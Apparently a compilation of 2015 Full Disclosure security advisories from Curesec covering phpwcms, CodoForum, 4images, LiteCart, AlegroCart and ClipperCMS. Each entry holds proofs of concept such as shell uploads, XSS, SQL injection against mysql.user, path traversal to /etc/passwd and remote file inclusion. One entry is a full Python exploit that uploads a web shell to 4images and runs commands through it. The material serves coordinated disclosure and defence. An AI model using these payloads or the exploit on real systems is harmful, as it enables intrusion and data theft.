overwritten, thus leading to code execution. Please note that a user account is needed to upload files. The user does not need administration rights, but there is no open registration by default. Proof of Concept Upload a .htaccess file and a PHP file here: http://localhost/phpwcms-phpwcms-1.7.9/phpwcms.php?do=files&p=8 The .htaccess file should contain: allow from all Now the uploaded PHP file can be accessed and executed: http://localhost/phpwcms-phpwcms-1.7.9/upload/shell.php?x=id 4. Code Execution CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description The functions include_int_php, include_int_phpcode, and include_ext_php can all be used to gain code execution. These functions can be used by any logged in user, admin rights are not required. Proof of Concept Create a new article. As author, use [PHP] passthru("touch mynewtest.php") [/PHP] Visiting http://localhost/phpwcms-phpwcms-1.7.9/feeds.php is one of the ways to trigger the code execution. Please note that the feed is by default cached for one hour, during which the code would not be executed as the cache is loaded instead. The vulnerable functions are used in other places as well, which means an attacker may not have to wait an hour for the cache to clear by triggering the code elsewhere. 5. Solution To mitigate this issue please upgrade at least to version 1.8.0 RC1: https://github.com/slackero/phpwcms/archive/phpwcms-1.8.0-RC1.zip Please note that a newer version might already be available. 6. Report Timeline 09/29/2015 Informed Vendor about Issue 09/29/2015 Vendor confirmed issues 10/21/2015 Reminded Vendor of Disclosure Date 10/25/2015 Vendor requests more time 11/17/2015 CVE Requested (no reply) 11/24/2015 Reminded Vendor of Disclosure Date 11/29/2015 Vendor releases fix 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/phpwcms-179-Code-Execution-122.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] phpwcms 1.7.9: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product: phpwcms 1.7.9 Fixed in: 1.8.0 RC1 Fixed Version https://github.com/slackero/phpwcms/archive/ Link: phpwcms-1.8.0-RC1.zip Vendor Website:http://www.phpwcms.de/ Vulnerability CSRF Type: Remote Yes Exploitable: Reported to09/29/2015 vendor: Disclosed to 12/02/2015 public: Release mode: Coordinated release CVE: requested, but not assigned CreditsTim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description There is no CSRF protection for any forms, which means that an attacker can perform any action a victim can perform, if the victim visits an attacker controlled website while logged in. In the case of phpwcms, an attacker can add an admin user and thus gain code execution. 3. Proof of Concept Add Admin User: http://localhost/phpwcms-phpwcms-1.7.9/phpwcms.php?do=admin&s=1"; method="POST"> 4. Solution To mitigate this issue please upgrade at least to version 1.8.0 RC1: https://github.com/slackero/phpwcms/archive/phpwcms-1.8.0-RC1.zip Please note that a newer version might already be available. 5. Report Timeline 09/29/2015 Informed Vendor about Issue 09/29/2015 Vendor confirmed issues 10/21/2015 Reminded Vendor of Disclosure Date 10/25/2015 Vendor requests more time 11/17/2015 CVE Requested (no reply) 11/24/2015 Reminded Vendor of Disclosure Date 11/29/2015 Vendor releases fix 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/phpwcms-179-CSRF-123.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CodoForum 3.4: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:CodoForum 3.4 Fixed in:not fixed Fixed Version Link: n/a Vendor Contact: ad...@codologic.com Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/01/2015 Disclosed to public: 12/02/2015 Release mode:Full Disclosure CVE: Requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description There is an XSS vulnerability in CodoForum 3.4. With this, it is possible to steal cookies, bypass CSRF protection, or inject JavaScript keyloggers. The HybridAuth 2.1.2 Install script is vulnerable to XSS attacks. In version 3.4, CodoForum did update HybridAuth to the latest version, but kept the old version in a folder called hybridauthold. 3. Proof of Concept http://localhost/codoforum/sys/Ext/hybridauthold/install.php/";>alert(1) 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/01/2015 Informed Vendor about Issue (no reply) 09/22/2015 Reminded Vendor of disclosure date 09/23/2015 Vendor requests clarification 09/23/2015 Clarified Issue 09/29/2015 Reminded Vendor of disclosure date 09/29/2015 Vendor requests more time 09/29/2015 Set new disclosure date 11/03/2015 Reminded Vendor of disclosure date (no reply) 11/17/2015 CVE Requested (no reply) 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/CodoForum-34-XSS-62.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] 4images 1.7.11: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:4images 1.7.11 Fixed in:1.7.12 Fixed Version Link: http://www.4homepages.de/download-4images Vendor Website: http://www.4homepages.de/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 11/04/2015 Release mode:Coordinated release CVE: Requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description 4images comes with a HTML Template editor which allows the editing of HTML files. But it will also create a new file if the passed file name does not already exist. When doing this, it does not check that the extension of the passed file is .html. Admin credentials are required to use the HTML template editor. 3. Proof of Concept POST /4images/admin/templates.php HTTP/1.1 __csrf=28a9a05b480c3f8ed326523b1ce7532c&action=savetemplate&content=%s", $lang['template_edit_error']); } } $action = "modifytemplates"; } 5. Solution To mitigate this issue please upgrade at least to version 1.7.12: http://www.4homepages.de/download-4images Please note that a newer version might already be available. 6. Report Timeline 09/29/2015 Informed Vendor about Issue 10/21/2015 Reminded Vendor of Disclosure Date 11/03/2015 Vendor releases fix 11/17/2015 CVE Requested (no reply) 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/4images-1711-Code-Execution-105.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] 4images 1.7.11: Code Execution Exploit
#!/usr/local/bin/python # Exploit for 4images 1.7.11 Code Execution vulnerability # An admin account is required to use this exploit # Curesec GmbH import sys import re import argparse import requests # requires requests lib parser = argparse.ArgumentParser() parser.add_argument("url", help="base url to vulnerable site") parser.add_argument("username", help="admin username") parser.add_argument("password", help="admin password") args = parser.parse_args() url = args.url username = args.username password = args.password loginPath = "/admin/index.php" fileManagerPath = "/admin/templates.php" shellFileName = "404.php" shellContent = "" def login(requestSession, url, username, password): csrfRequest = requestSession.get(url) csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text) csrfToken = csrfTokenRegEx.group(1) postData = {"action": "login", "redirect": ".%2F..%2Fadmin%2Findex.php", "__csrf": csrfToken, "loginusername": username, "loginpassword": password} loginResult = requestSession.post(url, data = postData).text return "loginpassword" not in loginResult def upload(requestSession, url, fileName, fileContent): csrfRequest = requestSession.get(url) csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text) csrfToken = csrfTokenRegEx.group(1) postData = {"action": "savetemplate", "content": fileContent, "template_file_name": fileName, "__csrf": csrfToken, "template_folder": "default"} loginResult = requestSession.post(url, data = postData).text def runShell(url): print("enter command, or enter exit to quit.") command = raw_input("$ ") while "exit" not in command: print(requests.get(url + command).text) command = raw_input("$ ") requestSession = requests.session() if login(requestSession, url + loginPath, username, password): print("successful: login") else: exit("ERROR: Incorrect username or password") upload(requestSession, url + fileManagerPath, shellFileName, shellContent) runShell(url + "/templates/default/" + shellFileName + "?x=") Blog Reference: https://blog.curesec.com/article/blog/4images-1711-Code-Execution-Exploit-117.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] 4images 1.7.11: Path Traversal
Security Advisory - Curesec Research Team 1. Introduction Affected Product:4images 1.7.11 Fixed in:1.7.12 Fixed Version Link: http://www.4homepages.de/download-4images Vendor Website: http://www.4homepages.de/ Vulnerability Type: Path Traversal Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 12/02/2015 Release mode:Coordinated release CVE: Requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N Description When downloading or displaying a backup file, the file Parameter is vulnerable to directory traversal. This is the case because the get_basefile function contains a bug. When the passed path name ends with a slash, it will return the entire path instead of the file name. By adding ?/ to the file name, an attacker can thus download or display arbitrary files. Admin credentials are required to view or download backup files. 3. Proof of Concept GET /4images/admin/backup.php?action=downloadbackup&file=../../../../../../etc/passwd?/ HTTP/1.1 GET /4images/admin/backup.php?action=showbackup&file=../../../../../../etc/passwd?/ HTTP/1.1 4. Code /admin/bachup.php if (isset($HTTP_GET_VARS['file']) || isset($HTTP_POST_VARS['file'])) { $file = (isset($HTTP_GET_VARS['file'])) ? get_basefile(trim($HTTP_GET_VARS['file'])) : get_basefile(trim($HTTP_POST_VARS['file'])); } else { $file = ""; } if ($action == "downloadbackup") { $size = @filesize(ROOT_PATH.DATABASE_DIR."/".$file); header("Content-type: application/x-unknown"); header("Content-length: $size\n"); header("Content-Disposition: attachment; filename=$file\n"); readfile(ROOT_PATH.DATABASE_DIR."/".$file); exit; } /includes/functions.php function get_basename($path) { $path = str_replace("\\", "/", $path); $name = substr(strrchr($path, "/"), 1); return $name ? $name : $path; } function get_basefile($path) { $basename = get_basename($path); preg_match("#(.+)\?(.+)#", $basename, $regs); return isset($regs[1]) ? $regs[1] : $basename; } 5. Solution To mitigate this issue please upgrade at least to version 1.7.12: http://www.4homepages.de/download-4images Please note that a newer version might already be available. 6. Report Timeline 09/29/2015 Informed Vendor about Issue 10/21/2015 Reminded Vendor of Disclosure Date 11/03/2015 Vendor releases fix 11/17/2015 CVE Requested (no reply) 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/4images-1711-Path-Traversal-106.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] 4images 1.7.11: SQL Injection
Security Advisory - Curesec Research Team 1. Introduction Affected Product:4images 1.7.11 Fixed in:1.7.12 Fixed Version Link: http://www.4homepages.de/download-4images Vendor Website: http://www.4homepages.de/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 12/02/2015 Release mode:Coordinated release CVE: Requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description When backing up the database, the user can supply the tables that should be backed up. The program does not check if these tables actually belong to the 4images database or to a different database. Because of this, it is possible to back up, and thus read, any database the database user has access to. However, even if there were a check for the database, it would still be possible to perform arbitrary SELECT statements by injecting into a SELECT query that looks like this: "SELECT * FROM $table" where $table is user supplied. Admin credentials are required to back up the database. 3. Proof of Concept POST /4images/admin/backup.php HTTP/1.1 __csrf=43c557c252fe6f57db4720b23771c7ab&action=makebackup&db_tables%5B%5D=mysql.user POST /4images/admin/backup.php HTTP/1.1 __csrf=43c557c252fe6f57db4720b23771c7ab&action=makebackup&db_tables%5B%5D=4images_comments where comment_id=-1 union all select user,password,3,4,5,6,7,8 from mysql.user 4. Solution To mitigate this issue please upgrade at least to version 1.7.12: http://www.4homepages.de/download-4images Please note that a newer version might already be available. 5. Report Timeline 09/29/2015 Informed Vendor about Issue 10/21/2015 Reminded Vendor of Disclosure Date 11/03/2015 Vendor releases fix 11/17/2015 CVE Requested (no reply) 12/02/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/4images-1711-SQL-Injection-108.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] 4images 1.7.12: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:4images 1.7.12 Fixed in:1.7.13 (update) Fixed Version Link: http://www.4homepages.de/download-4images Vendor Website: http://www.4homepages.de/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 12/02/2015 Release mode:Coordinated release CVE: Requested, but not assigned Credits Tim Coen of Curesec GmbH 2. Overview There are two reflected XSS vulnerabilities in 4images, as well as a persistent Open Redirect, which may also lead to XSS in older browsers. This allows an attacker to execute arbitrary JavaScript in the context of the browser of a victim if the victim clicks on an attacker supplied link or visits an attacker controlled website. With this, it is possible to bypass CSRF protection and thus do anything the victim can do, inject a JavaScript keylogger, or perform phishing attacks. It should be noted that the XSS vulnerability still existed in another form in the first release of version 1.17.13 and has been fixed with an update to that version. 3. Reflected XSS 1 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description When displaying the form to add new images, $_SERVER['PHP_SELF'] is echoed unencoded inside a select tag. Because of this, additional attributes can be added and new HTML tags can be created, leading to XSS. Proof of Concept Prior to Version 1.7.12: http://localhost/4images/admin/images.php/"; onfocus=alert(1) autofocus foo="?action=addimages Version 1.7.13 (before update): http://localhost/4images/admin/images.php/');alert(1);window.location=('?action=addimages This required a click of the victim to trigger, and a redirect will be performed after the execution of the injected code. Code /admin/images.php show_num_select_row(" ", "num_newimages", $lang['num_addnewimages_desc']); /admin/admin_functions.php function show_num_select_row($title, $option, $desc = "") { global $site_sess, $PHP_SELF, $action, $$option; echo "\n".$title."\n"; echo "".$desc; $url = $PHP_SELF; $url .= preg_match("/\?/", $url) ? "&" : "?"; $url .= "action=".$action; $url = $site_sess->url($url); echo "url($goto); } else { $framesrc = $site_sess->url("home.php"); } ?> Control Panel " name="head" scrolling="NO" NORESIZE frameborder="0" marginwidth="0" marginheight="0" border="no"> " name="nav" scrolling="auto" NORESIZE frameborder="0" marginwidth="0" marginheight="0" border="no"> 5. Persistent Open Redirect CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description When showing an uploaded image, the description and keyword are not properly encoded. Tags are removed, but it is still possible to add further attributes to the meta tag they are inserted into. This makes it possible to inject a redirect. This redirect will be persistent, meaning anyone visiting the site of the uploaded image will be redirected to an attacker controlled website. The attacker needs the rights to upload images to perform the attack, which means that a category needs to exist where anyone can upload images, or a category needs to exist where registered users can upload images and the registration must be open - which it is by default. Proof of Concept Upload an image, as description or keyword use: Version 1.7.11 and earlier: 5;URL=http://google.com/"; http-equiv="refresh" foo=" Version 1.7.12: 5;URL=http://google.com/"; http-equiv=refresh foo=" When visiting the page of the uploaded image, a redirect will be performed. With older browsers, it will be possible to inject and execute javascript as well. Code details.php $meta_keywords = !empty($image_row['image_keywords']) ? strip_tags(implode(", ", explode(",", $image_row['image_keywords']))) : ""; $meta_description = !empty($image_row['image_description']) ? strip_tags($image_row['image_description']) . ". " : ""; $site_template->register_vars(array( "detail_meta_description" => $meta_description, "detail_meta_keywords" => $meta_keywords, "prepend_head_title"=> $image_name . " - ", )); 6. Solution To mitigate this issue please upgrade at least to version 1.7.13: http://www.4homepages.de/download-4images Please note that a newer version might already be available. 7. Report Timeline 09/29/2015 Informed Vendor about Issue 10/21/2015 Reminded Vendor of Disclosure Date 11/03/2015 Vendor releases new version (1.7.12), partially fixing issues 11/17/2015 CVE Requested (no reply) 11/18/2015 Vendor releases new ve
Re: [FD] LiteCart 1.3.2: Multiple XSS
Hi, These vulnerabilities are similar, as both of them are issues with the query parameter of the search. However, the issue in version 1.1.2.1 exploits this line: This issue was fixed in version 1.2 by passing the query parameter to htmlspecialchars before passing it to sprintf. The issue in version 1.3.2 is that the query parameter is also echoed unencoded inside the title tag, which is why the POC contains . Best Curesec Research Team Am 11/18/2015 um 6:50 PM schrieb Henri Salo: > On Fri, Nov 13, 2015 at 05:07:01PM +0100, Curesec Research Team (CRT) wrote: >> 2. XSS 1 >> http://localhost/ecommerce/litecart-1.3.2/public_html/en/search?query=";>alert(1) >> 5. Solution >> To mitigate this issue please upgrade at least to version 1.3.3: > > This seems to be the same vulnerability as CVE-2014-7183[1] found by > Netsparker[2]. CVE-2014-7183 was fixed in version 1.2 according to the > changelog. > > 1: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7183 > 2: https://www.netsparker.com/xss-vulnerabilities-in-litecart/ > > ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] AlegroCart 1.2.8: SQL Injection
Security Advisory - Curesec Research Team 1. Introduction Affected Product:AlegroCart 1.2.8 Fixed in:Patch AC128_fix_17102015 Path Link: http://forum.alegrocart.com/download/file.php?id=1040 Vendor Website: http://alegrocart.com/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 11/13/2015 Release mode:Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview There is a blind SQL injection in the admin area of AlegroCart. Additionally, there is a blind SQL injection when a customer purchases a product. Because of a required interaction with PayPal, this injection is hard to exploit for an attacker. 3. BLind SQL Injection (Admin) CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description When viewing the list of uploaded files - or images - , the function check_download is called. This function performs a database query with the unsanitized name of the file. Because of this, an attacker can upload a file containing SQL code in its name, which will be executed once files are listed. Note that a similar function - check_filename - is called when deleting a file, making it likely that this operation is vulnerable as well. Admin credentials are required to exploit this issue. Proof of Concept POST /ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download&action=insert HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en; __atuvc=4%7C37 Connection: keep-alive Content-Type: multipart/form-data; boundary=---16690383031191084421650661794 Content-Length: 865 -16690383031191084421650661794 Content-Disposition: form-data; name="language[1][name]" test -16690383031191084421650661794 Content-Disposition: form-data; name="download"; filename="image.jpg' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(1,ENCODE('MSG','by 5 seconds')),null) -- -" Content-Type: image/jpeg img -16690383031191084421650661794 Content-Disposition: form-data; name="mask" 11953405959037.jpg -16690383031191084421650661794 Content-Disposition: form-data; name="remaining" 1 -16690383031191084421650661794 Content-Disposition: form-data; name="dc8bd9802df2ba1fd321b32bf73c62c4" f396df6c76265de943be163e9b65878a -16690383031191084421650661794-- Visiting http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download will trigger the injected code. Code /upload/admin2/model/products/model_admin_download.php function check_download($filename){ $result = $this->database->getRow("select * from download where filename = '".$filename."'"); return $result; } function check_filename($filename){ $results = $this->database->getRows("select filename from download where filename = '" . $filename . "'"); return $results; } /upload/admin2/controller/download.php function checkFiles() { $files=glob(DIR_DOWNLOAD.'*.*'); if (!$files) { return; } foreach ($files as $file) { $pattern='/\.('.implode('|',$this->prohibited_types).')$/'; $filename=basename($file); if (!preg_match($pattern,$file) && $this->validate->strlen($filename,1,128)) { $result = $this->modelDownload->check_download($filename); if (!$result) { $this->init($filename); } } } } 4. BLind SQL Injection (Customer) CVSS Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P Description There is an SQL Injection when using Paypal as a payment method during checkout. Please note that this injection requires that a successful interaction with Paypal took place. For test purposes, we commented out the parts of the code that actually perform this interaction with Paypal. Proof of Concept 1. Register a User 2. Buy an item, using PayPal as payment method; stop at step "Checkout Confirmation" 3. Visit this link to trigger the injection: http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=INJECTION. Note that this requires a valid paypal tx token. The injection can be exploited blind: http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=-1' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(5000,ENCODE('MSG','by 5 seconds')),null) %23) However, this is rather unpractical, especially considering the need for a valid PayPal token for each request. It is also possible
[FD] AlegroCart 1.2.8: LFI/RFI
Security Advisory - Curesec Research Team 1. Introduction Affected Product:AlegroCart 1.2.8 Fixed in:Patch AC128_fix_22102015 Path Link: http://forum.alegrocart.com/download/file.php?id=1047 Vendor Website: http://alegrocart.com/ Vulnerability Type: LFI/RFI Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 11/13/2015 Release mode:Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 6.5 AV:N/AC:L/Au:S/C:C/I:C/A:C Description When retrieving logs, there are no checks on the given file_path Parameter. Because of this, local or remote files can be included, which are then executed or printed. Admin credentials are required to view logs. 3. Proof of Concept Remote File: POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en Connection: keep-alive Content-Type: multipart/form-data; boundary=---16809437203643590021165278222 Content-Length: 441 -16809437203643590021165278222 Content-Disposition: form-data; name="directory" error_log -16809437203643590021165278222 Content-Disposition: form-data; name="file_path" http://localhost/shell.php -16809437203643590021165278222 Content-Disposition: form-data; name="decrytion" 0 -16809437203643590021165278222-- Local File: POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en Connection: keep-alive Content-Type: multipart/form-data; boundary=---16809437203643590021165278222 Content-Length: 425 -16809437203643590021165278222 Content-Disposition: form-data; name="directory" error_log -16809437203643590021165278222 Content-Disposition: form-data; name="file_path" /etc/passwd -16809437203643590021165278222 Content-Disposition: form-data; name="decrytion" 0 -16809437203643590021165278222-- For the patches AC128_fix_13102015 and AC128_fix_17102015 the following attack strings were still working: http://localhost/shell.php?x=ls&foo=/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/ /var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/../../../../../../../etc/passwd 4. Code / upload/admin2/controller/report_logs.php function get_file(){ $file = ''; if($this->request->gethtml('file_path', 'post')){ $file = file_get_contents($this->request->gethtml('file_path', 'post')); } if($this->request->gethtml('decrytion', 'post')){ $file = $this->ccvalidation->deCrypt($file, $this->config->get('config_token')); } if($file){ $file = str_replace(array("\r\n", "\r", "\n"),'', $file); } return $file; } 5. Solution To mitigate this issue please apply this patch: TODO Please note that a newer version might already be available. 6.. Report Timeline 09/29/2015 Informed Vendor about Issue 11/03/2015 Vendor releases fix 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/AlegroCart-128-LFIRFI-102.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] LiteCart 1.3.2: Multiple XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:LiteCart 1.3.2 Fixed in:1.3.3 Fixed Version Link: https://www.litecart.net/downloading?version=1.3.3.1 Vendor Contact: developm...@litecart.net Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/07/2015 Disclosed to public: 11/13/2015 Release mode:Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. XSS 1 Description The query parameter of the search is vulnerable to XSS. Proof of Concept http://localhost/ecommerce/litecart-1.3.2/public_html/en/search?query=";>alert(1) Code public_html/pages/search.inc.php document::$snippets['title'][] = empty($_GET['query']) ? language::translate('title_search_results', 'Search Results') : sprintf(language::translate('title_search_results_for_s', 'Search Results for "%s"'), $_GET['query']); 3. XSS 2 Description The value of the GET parameter slide_id is passed to trigger_error if it is an invalid id. trigger_error does not encode input, and as LiteCart shows errors by default, this leads to an XSS vulnerability. Proof of Concept http://localhost/ecommerce/litecart-1.3.2/public_html/admin/?app=slides&doc=edit_slide&page=1&slide_id=alert(1) Code includes/controllers/ctrl_slide.inc.php if (empty($this->data)) trigger_error('Could not find slide ('. $slide_id .') in database.', E_USER_ERROR); 4. XSS 3 Description The value of the GET parameter doc is passed to trigger_error if it is invalid. trigger_error does not encode input, and as LiteCart shows errors by default, this leads to an XSS vulnerability. Additionally, the accessing of non-existing array values leads to a notice, which contains the index unsanitized. Because of this, $app_config['docs'][$_GET['doc']] can also lead to XSS. Proof of Concept http://localhost/ecommerce/litecart-1.3.2/public_html/admin/?app=appearance&doc=alert(1) Code admin/index.php if (!empty($_GET['doc'])) { if (empty($app_config['docs'][$_GET['doc']]) || !file_exists(FS_DIR_HTTP_ROOT . WS_DIR_ADMIN . $_GET['app'].'.app/' . $app_config['docs'][$_GET['doc']])) trigger_error($_GET['app'] .'.app/'. $_GET['doc'] . ' is not a valid admin document', E_USER_ERROR); include vmod::check(FS_DIR_HTTP_ROOT . WS_DIR_ADMIN . $_GET['app'].'.app/' . $app_config['docs'][$_GET['doc']]); } else { include vmod::check(FS_DIR_HTTP_ROOT . WS_DIR_ADMIN . $_GET['app'].'.app/' . $app_config['docs'][$app_config['default']]); } 5. Solution To mitigate this issue please upgrade at least to version 1.3.3: https://www.litecart.net/downloading?version=1.3.3.1 Please note that a newer version might already be available. 6. Report Timeline 09/07/2015 Informed Vendor about Issue 10/05/2015 Vendor releases fix 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/LiteCart-132-Multiple-XSS-72.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] ClipperCMS 1.3.0: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:ClipperCMS 1.3.0 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://www.clippercms.com/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview There are various XSS vulnerabilities in ClipperCMS 1.3.0. Some require specific non-default settings, while others do not require these settings. 3. XSS 1 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Proof of Concept http://localhost/ClipperCMS-clipper_1.3.0/manager/media/browser/mcpuk/connectors/php/connector.php?foo=bar 4. XSS 2 CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description The name, email, message, and subjected parameter of the Contact form are vulnerable to XSS. Contrary to the XSS issues in the admin area described below, these XSS work without clickjacking or specific settings regarding referers. Proof of Concept The POCs for name and subjected are equivalent to this POC for email: http://localhost/ClipperCMS-clipper_1.3.0/index.php?id=6"; method="POST"> POC for message: http://localhost/ClipperCMS-clipper_1.3.0/index.php?id=6"; method="POST"> alert(1)" /> 5. XSS 3 CVSS Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description The search field of the System Events page is vulnerable to XSS. To execute the provided POC, the setting "Validate HTTP_REFERER headers" should be set to false. Please note that it is likely possible to exploit this issue via ClickJacking even if that setting is set to true. Proof of Concept http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=114"; method="POST"> 6. XSS 4ff CVSS Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description Multiple parameters of various components of the admin area are vulnerable to XSS. To execute these POC, the setting "Validate HTTP_REFERER headers" should be set to false. Proof of Concept http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=75&r=);}alert(1);function foo(){doRefresh( http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=31&mode=drill&path=foo';alert(1);var bar=' http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=88";>&id=1 http://localhostClipperCMS-clipper_1.3.0/manager/index.php?a=114&id=&listmode=";>&op=&search=test http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1";> 7. Solution This issue has not been fixed by the vendor. 8. Report Timeline 10/02/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/ClipperCMS-130-XSS-101.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: 